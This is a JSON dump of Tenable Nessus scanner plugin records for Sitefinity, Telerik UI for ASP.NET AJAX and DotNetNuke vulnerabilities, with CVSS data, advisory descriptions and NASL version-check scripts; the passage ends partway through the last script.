{"nessus": [{"lastseen": "2022-07-15T14:32:23", "description": "The version of Sitefinity installed on the remote host is prior to 10.0.6412.0. It is, therefore, affected by multiple vulnerabilities in Telerik DialogHandler and RadAsyncUpload :\n\n - A cryptographic weakness exists in Telerik.Web.UI that can be exploited to disclose encryption keys\n\n - An unrestricted file upload vulnerability exists in Telerik.Web.UI due to weak encryption\n\n - An insecure direct object reference vulnerability exists in Telerik.Web.UI due to user input used directly by RadAsyncUpload without validation\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-31T00:00:00", "type": "nessus", "title": "Sitefinity < 10.0.6412.0 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2217", "CVE-2017-11317", "CVE-2017-11357", "CVE-2017-9248"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:progress:sitefinity:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112501", "href": "https://www.tenable.com/plugins/was/112501", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-14T16:20:54", "description": "According to its self-reported version number, the version of Telerik UI for ASP.NET AJAX prior to 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-01T00:00:00", "type": "nessus", "title": "Telerik UI for ASP.NET AJAX RadAsyncUpload .NET Deserialization Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:telerik:ui_for_asp.net_ajax:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112521", "href": "https://www.tenable.com/plugins/was/112521", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:58:24", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-24T00:00:00", "type": "nessus", "title": "Telerik UI for ASP.NET AJAX RadAsyncUpload .NET Deserialization Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax"], "id": "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2019-18935.NASL", "href": "https://www.tenable.com/plugins/nessus/135970", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135970);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2019-18935\");\n script_xref(name:\"IAVA\", value:\"2020-A-0219\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Telerik UI for ASP.NET AJAX RadAsyncUpload .NET Deserialization Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application development suite installed on the remote Windows\nhost is affected by a deserialization vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability \nin the RadAsyncUpload function. This is exploitable when the encryption keys are known due to \nthe presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result \nin remote code execution. (As of 2020.1.114, a default setting prevents the exploit. \nIn 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)\");\n # https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?de2ce6ef\");\n # https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?&_ga=2.224762457.29387225.1587722153-1707628900.1586272484#allowedcustommetadatatypes\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be6fd178\");\n # https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?57e10c1e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Telerik UI for ASP.NET AJAX version R3 2019 SP1\n(2019.3.1023) or later, and enable the type whitelisting feature of RadAsyncUpload.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-18935\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:telerik:ui_for_asp.net_ajax\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"telerik_ui_for_aspnet_ajax_installed.nbin\");\n script_require_keys(\"installed_sw/Telerik UI for ASP.NET AJAX\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('install_func.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\n\nvar app_name = 'Telerik UI for ASP.NET AJAX';\nvar opt_in = FALSE;\nvar install = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nvar version = install['version'];\nvar path = install['path'];\n\n# 2010.1.309 and earlier not affected \nif (ver_compare(ver:version, fix:'2010.1.309.0', strict:FALSE) <= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n\n# 2020.1.114 and later have default settings available\nif (ver_compare(ver:version, fix:'2020.1.114.0', strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n\n# 2019.3.1023 has opt-in settings available, but not by default\nif ((ver_compare(ver:version, fix:'2019.3.1023', strict:FALSE) >= 0) &&\n (ver_compare(ver:version, fix:'2020.1.114.0', strict:FALSE) <= 0))\n{\n opt_in = TRUE;\n}\n\nif (opt_in)\n{\n # if version is 2019.3.1023 or higher, but lower than 2020.1.114.0, \n # type whitelisting feature of RadAsyncUpload needs to be enabled manually.\n # so if we're paranoid, we add a note to the report\n # (done below) and if we're not paranoid, we audit out\n if (report_paranoia < 2) audit(AUDIT_PARANOID);\n}\n\nvar port = get_kb_item('SMB/transport');\nif (empty_or_null(port))\n port = 445;\n\nvar report = report_items_str(\n report_items:make_array(\n 'Path', path,\n 'Installed version', version,\n 'Fixed version', '2019.3.1023'\n ),\n ordered_fields:make_list('Path', 'Installed version', 'Fixed version')\n);\n\nif (opt_in)\n report += '\\n\\n' + 'Although the type whitelisting feature of RadAsyncUpload is available for this version,' +\n '\\n' + 'we are not able to determine if this is actually enabled. Following the advisory,' +\n '\\n' + 'you should ensure that this is the case.';\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T17:39:57", "description": "The version of Telerik UI for ASP.NET AJAX installed on the remote Windows host is affected by multiple vulnerabilities in Telerik.Web.UI.dll. An unauthenticated, remote attacker can exploit this, via specially crafted data, to execute arbitrary code.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-02T00:00:00", "type": "nessus", "title": "Telerik UI for ASP.NET AJAX RadAsyncUpload Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357"], "modified": "2022-04-22T00:00:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax"], "id": "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2017-11317.NASL", "href": "https://www.tenable.com/plugins/nessus/107096", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107096);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\"CVE-2017-11317\", \"CVE-2017-11357\");\n script_bugtraq_id(103171, 103173);\n script_xref(name:\"IAVA\", value:\"2018-A-0066-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n\n script_name(english:\"Telerik UI for ASP.NET AJAX RadAsyncUpload Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application development suite installed on the remote Windows\nhost is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Telerik UI for ASP.NET AJAX installed on the remote\nWindows host is affected by multiple vulnerabilities in\nTelerik.Web.UI.dll. An unauthenticated, remote attacker can exploit\nthis, via specially crafted data, to execute arbitrary code.\");\n # https://www.telerik.com/support/kb/aspnet-ajax/upload-%28async%29/details/insecure-direct-object-reference\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77b0e65f\");\n # https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?49cbdec3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Telerik UI for ASP.NET AJAX version R2 2017 SP2\n(2017.2.711) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11357\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:telerik:ui_for_asp.net_ajax\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"telerik_ui_for_aspnet_ajax_installed.nbin\");\n script_require_keys(\"installed_sw/Telerik UI for ASP.NET AJAX\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\n\nfunction display_dword (dword, nox)\n{\n local_var tmp;\n if (isnull(nox) || (nox == FALSE))\n tmp = \"0x\";\n else\n tmp = \"\";\n return \"\" + tmp + toupper(hexstr(raw_string(\n (dword >>> 24) & 0xFF,\n (dword >>> 16) & 0xFF,\n (dword >>> 8) & 0xFF,\n dword & 0xFF\n )));\n}\n\napp_name = \"Telerik UI for ASP.NET AJAX\";\nhas_a_patch = FALSE;\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\npath = install['path'];\nweb_ui_dll = install['web_ui_dll'];\n\n# 2017.2.711 and later is patched\nif (ver_compare(ver:version, fix:\"2017.2.711.0\", strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n\n# 2011.1.315 to 2017.2.621 have patches + mitigations available\nif ((ver_compare(ver:version, fix:\"2011.1.315.0\", strict:FALSE) >= 0) &&\n (ver_compare(ver:version, fix:\"2017.2.621.9999\", strict:FALSE) <= 0))\n\n{\n # check for \"Telerik.Web.UI.Patch\" in the File Description\n\n # Connect to the appropriate share.\n port = kb_smb_transport();\n login = kb_smb_login();\n pass = kb_smb_password();\n domain = kb_smb_domain();\n\n if (!smb_session_init())\n audit(AUDIT_FN_FAIL, \"smb_session_init\");\n\n share = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:web_ui_dll);\n dll = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\", string:web_ui_dll);\n\n rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\n if (rc != 1)\n {\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, share);\n }\n\n fh = CreateFile(\n file:dll,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n\n file_description = NULL;\n if (!isnull(fh))\n {\n ret = GetFileVersionEx(handle:fh);\n if (!isnull(ret)) children = ret['Children'];\n if (!isnull(children))\n {\n varfileinfo = children['VarFileInfo'];\n if (!isnull(varfileinfo))\n {\n translation =\n (get_word (blob:varfileinfo['Translation'], pos:0) << 16) +\n get_word (blob:varfileinfo['Translation'], pos:2);\n translation = tolower(display_dword(dword:translation, nox:TRUE));\n }\n stringfileinfo = children['StringFileInfo'];\n if (!isnull(stringfileinfo) && !isnull(translation))\n {\n data = stringfileinfo[translation];\n if (!isnull(data)) file_description = data['FileDescription'];\n else\n {\n data = stringfileinfo[toupper(translation)];\n if (!isnull(data)) file_description = data['FileDescription'];\n }\n }\n }\n CloseFile(handle:fh);\n }\n NetUseDel();\n\n if (empty_or_null(file_description))\n exit(1, \"Failed to get the file description of \" + web_ui_dll + \".\");\n\n if (file_description == \"Telerik.Web.UI.Patch\")\n has_a_patch = TRUE;\n}\n\nif (has_a_patch)\n{\n # if it has *a* patch, we can't be sure that it is the correct patch\n # and we also can't tell if they have applied the mitigations to go\n # with the patch, so if we're paranoid, we add a note to the report\n # (done below) and if we're not paranoid, we audit out\n if (report_paranoia < 2) audit(AUDIT_PARANOID);\n}\n\nport = get_kb_item(\"SMB/transport\");\nif (empty_or_null(port))\n port = 445;\n\nreport = report_items_str(\n report_items:make_array(\n \"Path\", path,\n \"Installed version\", version,\n \"Fixed version\", \"2017.2.711.0 or vendor supplied patch\"\n ),\n ordered_fields:make_list(\"Path\", \"Installed version\", \"Fixed version\")\n);\n\nif (has_a_patch)\n report += '\\n\\n' + \"Although a patch has been applied, we aren't able to determine if this is the\" +\n '\\n' + \"correct patch for these vulnerabilities. As per the vendor advisory, you must\" +\n '\\n' + \"ensure that the patch you applied was downloaded after August 15th, 2017. You\" +\n '\\n' + \"must also ensure the appropriate mitigations (disable file uploads or disable\" +\n '\\n' + \"POST requests) have been applied as per the vendor advisory\";\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-14T16:20:58", "description": "According to its self-reported version number, the version of Telerik UI for ASP.NET AJAX is affected by multiple vulnerabilities in Telerik.Web.UI.dll :\n\n - An insecure direct object reference vulnerability due to user input used directly by RadAsyncUpload without modification or validation. (CVE-2017-11357)\n\n - An unrestricted file upload due to weak encryption used in old versions of Telerik.Web.UI to encrypt data used by RadAsyncUpload. (CVE-2017-11317) An unauthenticated, remote attacker can exploit this, via specially crafted data, to execute arbitrary code.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-01T00:00:00", "type": "nessus", "title": "Telerik UI for ASP.NET AJAX RadAsyncUpload Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:telerik:ui_for_asp.net_ajax:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112522", "href": "https://www.tenable.com/plugins/was/112522", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-11T16:40:16", "description": "According to its self-reported version, the instance of Dotnetnuke running on the remote web server is 7.0.x prior to 9.5.0. It is, therefore, affected by a XSS vulnerability.\n\n - For websites with user registration enabled, it is possible for a user to craft a registration that would inject malicious content to their profile that could expose information using an XSS style exploit.\n Mitigating Factors Websites not allowing registration will be unaffected by this issue. Fix(es) for This Issue Users must upgrade DNN Platform to version 9.5.0 or later to be protected from this issue. Affected Versions DNN Platform version 7.0.0 through 9.4.4 (2020-04)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-06-03T00:00:00", "type": "nessus", "title": "Dotnetnuke 7.0.x < 9.5.0 XSS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-19790"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:*"], "id": "DOTNETNUKE_9_5_0.NASL", "href": "https://www.tenable.com/plugins/nessus/137079", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137079);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_name(english:\"Dotnetnuke 7.0.x < 9.5.0 XSS\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An ASP.NET application running on the remote web server is affected by a XSS vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Dotnetnuke running on the remote web server is 7.0.x prior to\n9.5.0. It is, therefore, affected by a XSS vulnerability.\n\n - For websites with user registration enabled, it is\n possible for a user to craft a registration that would\n inject malicious content to their profile that could\n expose information using an XSS style exploit.\n Mitigating Factors Websites not allowing registration\n will be unaffected by this issue. Fix(es) for This Issue\n Users must upgrade DNN Platform to version 9.5.0 or\n later to be protected from this issue. Affected Versions\n DNN Platform version 7.0.0 through 9.4.4 (2020-04)\n\nNote that Nessus has not tested for this issue but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Dotnetnuke version 9.5.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19790\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:dotnetnuke:dotnetnuke\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"dotnetnuke_detect.nasl\");\n script_require_keys(\"installed_sw/DNN\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp = 'DNN';\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, asp:TRUE);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '7.0.0', 'max_version' : '9.4.4', 'fixed_version' : '9.5.0' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{'xss':TRUE});\n", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-11T16:40:18", "description": "According to its self-reported version, the instance of Dotnetnuke running on the remote web server is 3.1.x prior to 9.6.0, 5.0.x prior to 9.6.0, 6.0.x prior to 9.6.0, or 7.0.x prior to 9.6.0. It is, therefore, affected by multiple vulnerabilities.\n\n - Modules that were discarded to the recycle bin were still able to respond to API calls to their endpoints, which could result in data uploads and other interactions that would go unnoticed since the module was not visually displayed. Mitigating Factors This only impacted modules that are using the WebAPI interface following the DNN Security protocols (which is a smaller subset of modules). Additionally, interactions are still bound by all other security rules, as if the module was placed on the page. Fix(es) for This Issue An upgrade to DNN Platform version 9.5.0 or later is required Affected Versions DNN Platform Versions 6.0.0 through 9.4.4 (2020-01)\n\n - A malicious user may be able to replace or update files with specific file extensions with content of their selection, without being authenticated to the website.\n Fix(es) for This Issue To remediate this issue an upgrade to DNN Platform Version (9.5.0 or later) is required. Affected Versions DNN Platform Versions 5.0.0 through 9.6.0 Acknowledgements The DNN Community thanks the following for identifying the issue and/or working with us to help protect Users Robbert Bosker of DotControl Digital Creatives Related CVE: CVE-2019-19790 (2020-02)\n\n - A number of older JavaScript libraries have been updated, closing multiple individual security notices.\n Fixes for the Issue Due to the nature of the elements included, and their usage with DNN Platform an upgrade to DNN Platform 9.5.0 or later is the only resolution for this issue.. Affected Versions DNN Platform version 6.0.0 through 9.4.4 (2020-03)\n\n - A malicious user may upload a file with a specific configuration and tell the DNN Platform to extract the file. This process could overwrite files that the user was not granted permissions to, and would be done without the notice of the administrator. Fix(es) for This Issue The only proper fix for this issue is to upgrade to DNN Platform 9.6.0 or later. Affected Versions DNN Platform version 5.0.0 through 9.5.0. (It is believed this may affect 3.x and 4.x installations as well, but has not been verified) (2020-05)\n\n - A malicious user may utilize a process to include in a message a file that they might not have had the permission to view/upload, and with the methods that the DNN File system works they may be able to gain access to this file. Mitigating Factors Installations configured using the Secure folder type would not have the file contents disclosed. This is the recommended manner to guarantee file security for confidential documents as it is the only method that provides a secure file check at download. Fix(es) for This Issue Upgrading to DNN Platform version 9.6.0 or later is required to mitigate this issue. Acknowledgements The DNN Community would like to thank the following for their assistance with this issue. Connor Neff Affected Versions DNN Platform version 7.0.0 through 9.5.0. (2020-06)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-06-03T00:00:00", "type": "nessus", "title": "Dotnetnuke 3.1.x < 9.6.0 / 5.0.x < 9.6.0 / 6.0.x < 9.6.0 / 7.0.x < 9.6.0 Multiple Vulnerabilities (09.06.00)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-19790"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:*"], "id": "DOTNETNUKE_9_6_0.NASL", "href": "https://www.tenable.com/plugins/nessus/137055", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137055);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2019-19790\");\n\n script_name(english:\"Dotnetnuke 3.1.x < 9.6.0 / 5.0.x < 9.6.0 / 6.0.x < 9.6.0 / 7.0.x < 9.6.0 Multiple Vulnerabilities (09.06.00)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An ASP.NET application running on the remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Dotnetnuke running on the remote web server is 3.1.x prior to\n9.6.0, 5.0.x prior to 9.6.0, 6.0.x prior to 9.6.0, or 7.0.x prior to 9.6.0. It is, therefore, affected by multiple\nvulnerabilities.\n\n - Modules that were discarded to the recycle bin were\n still able to respond to API calls to their endpoints,\n which could result in data uploads and other\n interactions that would go unnoticed since the module\n was not visually displayed. Mitigating Factors This only\n impacted modules that are using the WebAPI interface\n following the DNN Security protocols (which is a smaller\n subset of modules). Additionally, interactions are still\n bound by all other security rules, as if the module was\n placed on the page. Fix(es) for This Issue An upgrade to\n DNN Platform version 9.5.0 or later is required Affected\n Versions DNN Platform Versions 6.0.0 through 9.4.4\n (2020-01)\n\n - A malicious user may be able to replace or update files\n with specific file extensions with content of their\n selection, without being authenticated to the website.\n Fix(es) for This Issue To remediate this issue an\n upgrade to DNN Platform Version (9.5.0 or later) is\n required. Affected Versions DNN Platform Versions 5.0.0\n through 9.6.0 Acknowledgements The DNN Community thanks\n the following for identifying the issue and/or working\n with us to help protect Users Robbert Bosker of\n DotControl Digital Creatives Related CVE: CVE-2019-19790\n (2020-02)\n\n - A number of older JavaScript libraries have been\n updated, closing multiple individual security notices.\n Fixes for the Issue Due to the nature of the elements\n included, and their usage with DNN Platform an upgrade\n to DNN Platform 9.5.0 or later is the only resolution\n for this issue.. Affected Versions DNN Platform version\n 6.0.0 through 9.4.4 (2020-03)\n\n - A malicious user may upload a file with a specific\n configuration and tell the DNN Platform to extract the\n file. This process could overwrite files that the user\n was not granted permissions to, and would be done\n without the notice of the administrator. Fix(es) for\n This Issue The only proper fix for this issue is to\n upgrade to DNN Platform 9.6.0 or later. Affected\n Versions DNN Platform version 5.0.0 through 9.5.0. (It\n is believed this may affect 3.x and 4.x installations as\n well, but has not been verified) (2020-05)\n\n - A malicious user may utilize a process to include in a\n message a file that they might not have had the\n permission to view/upload, and with the methods that the\n DNN File system works they may be able to gain access to\n this file. Mitigating Factors Installations configured\n using the Secure folder type would not have the file\n contents disclosed. This is the recommended manner to\n guarantee file security for confidential documents as it\n is the only method that provides a secure file check at\n download. Fix(es) for This Issue Upgrading to DNN\n Platform version 9.6.0 or later is required to mitigate\n this issue. Acknowledgements The DNN Community would\n like to thank the following for their assistance with\n this issue. Connor Neff Affected Versions DNN Platform\n version 7.0.0 through 9.5.0. (2020-06)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://nvd.nist.gov/vuln/detail/CVE-2019-19790\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Dotnetnuke version 9.6.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19790\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/07\");\n 